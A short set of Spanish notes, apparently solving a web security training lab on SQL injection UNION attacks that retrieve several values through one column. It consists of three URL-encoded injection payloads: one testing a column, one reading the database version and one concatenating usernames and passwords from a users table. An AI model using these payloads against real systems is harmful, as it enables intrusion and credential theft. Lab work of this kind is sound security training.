10 - SQL injection UNION attack, retrieving multiple values in a single column

Se puede usar la segunda columna

'+UNION+SELECT+NULL,'a'+--+- 

Sacamos la versión de la DB usada

'+UNION+SELECT+NULL,version()+--+-

Usamos concatenación de strings

'+UNION+SELECT+NULL,username||':'||password+FROM+users+--+-